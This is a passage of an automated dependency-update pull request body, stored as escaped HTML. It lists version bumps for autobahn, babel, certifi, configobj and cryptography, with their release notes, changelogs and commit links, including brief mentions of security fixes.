href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1634\"\u003e#1634\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/359f868f9db410586cf01c071220994d8d7f165a\"\u003e\u003ccode\u003e359f868\u003c/code\u003e\u003c/a\u003e prepare release (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1620\"\u003e#1620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/a7c7dff0c734d4e1798085a8106cf656e2c5a23d\"\u003e\u003ccode\u003ea7c7dff\u003c/code\u003e\u003c/a\u003e prepare release (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1617\"\u003e#1617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/f2505175ce86bec668ca1163a9e0f14b54afbae0\"\u003e\u003ccode\u003ef250517\u003c/code\u003e\u003c/a\u003e Updates the GHA deploy workflow to build the universal wheel and upload to Py...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/a51c2f52af25dcd949e47467f3ae048761d399e8\"\u003e\u003ccode\u003ea51c2f5\u003c/code\u003e\u003c/a\u003e Updated web3 and eth-abi to not use beta versions (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1616\"\u003e#1616\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/crossbario/autobahn-python/compare/v18.6.1...v24.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `babel` from 2.6.0 to 2.9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/releases\"\u003ebabel's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThe internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003ch1\u003eUpcoming version support changes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Use CLDR 37 – Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/734\"\u003e#734\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNumbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/726\"\u003e#726\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eImport: Simplify iteration code in \u0026quot;import_cldr.py\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eImport: Stop using deprecated ElementTree methods \u0026quot;getchildren()\u0026quot; and \u0026quot;getiterator()\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eMessages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eMessages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eTests: fix tests when using Python 3.9 – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eTests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\u003c/li\u003e\n\u003cli\u003eTests: Support Py.test 6.x – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eUtilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/724\"\u003e#724\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUtilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocumentation\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate parse_number comments – Brad Martin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/708\"\u003e#708\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd \u003cstrong\u003eiter\u003c/strong\u003e to Catalog documentation – \u003ca href=\"https://github.com/CyanNani123\"\u003e\u003ccode\u003e@​CyanNani123\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.8.1\u003c/h2\u003e\n\u003cp\u003eThis patch version only differs from 2.8.0 in that it backports in \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/752\"\u003e#752\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003eVersion 2.8.0\u003c/h2\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Upgrade to CLDR 36.0 - Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/679\"\u003e#679\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMessages: Don't even open files with the \u0026quot;ignore\u0026quot; extraction method - \u003ca href=\"https://github.com/sebleblanc\"\u003e\u003ccode\u003e@​sebleblanc\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eNumbers: Fix formatting very small decimals when quantization is disabled - Lev Lybin, \u003ca href=\"https://github.com/miluChen\"\u003e\u003ccode\u003e@​miluChen\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/662\"\u003e#662\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMessages: Attempt to sort all messages – Mario Frasca (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/651\"\u003e#651\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/606\"\u003e#606\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocs\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/blob/master/CHANGES.rst\"\u003ebabel's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* The internal locale-data loading functions now validate the name of the locale file to be loaded and only\n  allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003cp\u003eUpcoming version support changes\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eImprovements\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* CLDR: Use CLDR 37 – Aarni Koskela (:gh:`734`)\n* Dates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (:gh:`741`)\n* Numbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (:gh:`726`)\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Dates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\n* Import: Simplify iteration code in \u0026amp;quot;import_cldr.py\u0026amp;quot; – Felix Schwarz\n* Import: Stop using deprecated ElementTree methods \u0026amp;quot;getchildren()\u0026amp;quot; and \u0026amp;quot;getiterator()\u0026amp;quot; – Felix Schwarz\n* Messages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\n* Messages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\n* Tests: fix tests when using Python 3.9 – Felix Schwarz\n* Tests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\n* Tests: Support Py.test 6.x – Aarni Koskela\n* Utilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (:gh:`724`)\n* Utilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\n\nDocumentation\n\u0026lt;/code\u0026gt;\u0026lt;/pre\u0026gt;\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;Update parse_number comments – Brad Martin (:gh:\u0026lt;code\u0026gt;708\u0026lt;/code\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Add \u0026lt;strong\u0026gt;iter\u0026lt;/strong\u0026gt; to Catalog documentation – \u0026lt;a href=\u0026quot;https://github.com/CyanNani123\u0026quot;\u0026gt;\u0026lt;code\u0026gt;@​CyanNani123\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;h2\u0026gt;Version 2.8.1\u0026lt;/h2\u0026gt;\n\u0026lt;p\u0026gt;This is solely a patch release to make running tests on Py.test 6+ possible.\u0026lt;/p\u0026gt;\n\u0026lt;p\u0026gt;Bugfixes\u0026lt;/p\u0026gt;\n\u0026lt;!-- raw HTML omitted --\u0026gt;\n\u0026lt;/blockquote\u0026gt;\n\u0026lt;p\u0026gt;... (truncated)\u0026lt;/p\u0026gt;\n\u0026lt;/details\u0026gt;\n\u0026lt;details\u0026gt;\n\u0026lt;summary\u0026gt;Commits\u0026lt;/summary\u0026gt;\n\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/a99fa2474c808b51ebdabea18db871e389751559\u0026quot;\u0026gt;\u0026lt;code\u0026gt;a99fa24\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Use 2.9.0's setup.py for 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/60b33e083801109277cb068105251e76d0b7c14e\u0026quot;\u0026gt;\u0026lt;code\u0026gt;60b33e0\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Become 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/412015ef642bfcc0d8ba8f4d05cdbb6aac98d9b3\u0026quot;\u0026gt;\u0026lt;code\u0026gt;412015e\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/782\u0026quot;\u0026gt;#782\u0026lt;/a\u0026gt; from python-babel/locale-basename\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5caf717ceca4bd235552362b4fbff88983c75d8c\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5caf717\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Disallow special filenames on Windows\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/3a700b5b8b53606fd98ef8294a56f9510f7290f8\u0026quot;\u0026gt;\u0026lt;code\u0026gt;3a700b5\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Run locale identifiers through \u0026lt;code\u0026gt;os.path.basename()\u0026lt;/code\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5afe2b2f11dcdd6090c00231d342c2e9cd1bdaab\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5afe2b2\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/754\u0026quot;\u0026gt;#754\u0026lt;/a\u0026gt; from python-babel/github-ci\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/58de8342f865df88697a4a166191e880e3c84d82\u0026quot;\u0026gt;\u0026lt;code\u0026gt;58de834\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Replace Travis + Appveyor with GitHub Actions (WIP)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/d1bbc08e845d03d8e1f0dfa0e04983d755f39cb5\u0026quot;\u0026gt;\u0026lt;code\u0026gt;d1bbc08\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; import_cldr: use logging; add -q option\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/156b7fb9f377ccf58c71cf01dc69fb10c7b69314\u0026quot;\u0026gt;\u0026lt;code\u0026gt;156b7fb\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Quiesce CLDR download progress bar if requested (or not a TTY)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/613dc1700f91c3d40b081948c0dd6023d8ece057\u0026quot;\u0026gt;\u0026lt;code\u0026gt;613dc17\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Make the import warnings about unsupported number systems less verbose\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Additional commits viewable in \u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/compare/v2.6.0...v2.9.1\u0026quot;\u0026gt;compare view\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;/details\u0026gt;\n\n\u0026lt;br /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\nUpdates `certifi` from 2018.4.16 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2018.04.16...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `configobj` from 5.0.6 to 5.0.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/DiffSK/configobj/releases\"\u003econfigobj's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.0.9\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAddress CVE-2023-26112 ReDoS by \u003ca href=\"https://github.com/cdcadman\"\u003e\u003ccode\u003e@​cdcadman\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/236\"\u003eDiffSK/configobj#236\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDrop Python 2 support and compatibility code by \u003ca href=\"https://github.com/jelmer\"\u003e\u003ccode\u003e@​jelmer\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/237\"\u003eDiffSK/configobj#237\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eExtra 2014 by \u003ca href=\"https://github.com/jelmer\"\u003e\u003ccode\u003e@​jelmer\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/245\"\u003eDiffSK/configobj#245\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003esetup.py: fix license tag by \u003ca href=\"https://github.com/yegorich\"\u003e\u003ccode\u003e@​yegorich\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/241\"\u003eDiffSK/configobj#241\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate minimum python to 3.7 everywhere, and add 3.12 by \u003ca href=\"https://github.com/jelmer\"\u003e\u003ccode\u003e@​jelmer\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/246\"\u003eDiffSK/configobj#246\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cdcadman\"\u003e\u003ccode\u003e@​cdcadman\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/236\"\u003eDiffSK/configobj#236\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yegorich\"\u003e\u003ccode\u003e@​yegorich\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/241\"\u003eDiffSK/configobj#241\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/DiffSK/configobj/compare/v5.0.8...v5.0.9\"\u003ehttps://github.com/DiffSK/configobj/compare/v5.0.8...v5.0.9\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003econfirming things work in newer python versions\u003c/h2\u003e\n\u003cp\u003e5.0.7 originally did this work, but 5.0.8 fixes a regression (\u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/230\"\u003e#230\u003c/a\u003e)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/DiffSK/configobj/blob/release/CHANGES.rst\"\u003econfigobj's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cp\u003eRelease 5.0.9\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edrop support for Python 2 and \u0026lt;3.7\u003c/li\u003e\n\u003cli\u003efix CVE-2023-26112, ReDoS attack\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eRelease 5.0.8\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efixing/test for a regression introduced in 5.0.7 that prevented \u003ccode\u003eimport validate\u003c/code\u003e from working\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eRelease 5.0.7\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupdate testing to validate against python version 2.7 and 3.5-3.11\u003c/li\u003e\n\u003cli\u003eupdate broken links / non-existent services and references\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eOlder Releases\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRelease 5.0.6 improves error messages in certain edge cases\u003c/li\u003e\n\u003cli\u003eRelease 5.0.5 corrects a unicode-bug that still existed in writing files\u003c/li\u003e\n\u003cli\u003eRelease 5.0.4 corrects a unicode-bug that still existed in reading files after\nfixing lists of string in 5.0.3\u003c/li\u003e\n\u003cli\u003eRelease 5.0.3 corrects errors related to the incorrectly handling unicode\nencoding and writing out files\u003c/li\u003e\n\u003cli\u003eRelease 5.0.2 adds a specific error message when trying to install on\nPython versions older than 2.5\u003c/li\u003e\n\u003cli\u003eRelease 5.0.1 fixes a regression with unicode conversion not happening\nin certain cases PY2\u003c/li\u003e\n\u003cli\u003eRelease 5.0.0 updates the supported Python versions to 2.6, 2.7, 3.2, 3.3\nand is otherwise unchanged\u003c/li\u003e\n\u003cli\u003eRelease 4.7.2 fixes several bugs in 4.7.1\u003c/li\u003e\n\u003cli\u003eRelease 4.7.1 fixes a bug with the deprecated options keyword in 4.7.0.\u003c/li\u003e\n\u003cli\u003eRelease 4.7.0 improves performance adds features for validation and\nfixes some bugs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/242dfd09510e937574758da76ddc644b71f8cc4f\"\u003e\u003ccode\u003e242dfd0\u003c/code\u003e\u003c/a\u003e release 5.0.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/8857b0882539cb2c5aef8a0061aec78004a47ccb\"\u003e\u003ccode\u003e8857b08\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/246\"\u003e#246\u003c/a\u003e from DiffSK/python-version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/d6f7597df5ff4f91081c0d9329db1d8cbc0990f8\"\u003e\u003ccode\u003ed6f7597\u003c/code\u003e\u003c/a\u003e Update minimum python to 3.7 everywhere, and add 3.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/8ffcf0c05d3d4a950380d922ba902a08e3e4e853\"\u003e\u003ccode\u003e8ffcf0c\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/241\"\u003e#241\u003c/a\u003e from yegorich/license\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/5e2f14313e7f093e77b53ad4acbb062af6bc8b2b\"\u003e\u003ccode\u003e5e2f143\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/245\"\u003e#245\u003c/a\u003e from jelmer/extra-2014\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/fdf3634418d9acfc72a534b26a796d195c4a7e42\"\u003e\u003ccode\u003efdf3634\u003c/code\u003e\u003c/a\u003e Drop extra '2014' in LICENSE file. Fixes \u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/233\"\u003e#233\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/3480a6ee929bdbaa61ec28e325b261d79396b09c\"\u003e\u003ccode\u003e3480a6e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/237\"\u003e#237\u003c/a\u003e from jelmer/drop-python2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/008165c8f200a7c636c9095868c8c540f104eeda\"\u003e\u003ccode\u003e008165c\u003c/code\u003e\u003c/a\u003e Drop python 3.5 from GitHub action, since it now fails to download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/861383cd11dec0c2427724f0993437a1762c2a7a\"\u003e\u003ccode\u003e861383c\u003c/code\u003e\u003c/a\u003e Drop support for Python \u0026lt; 3.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/7c618b0bbaff6ecaca51a6f05b29795d1377a4a5\"\u003e\u003ccode\u003e7c618b0\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/236\"\u003e#236\u003c/a\u003e from cdcadman/cve_2023_26112\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/DiffSK/configobj/compare/v5.0.6...v5.0.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cryptography` from 2.2.2 to 44.0.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst\"\u003ecryptography's 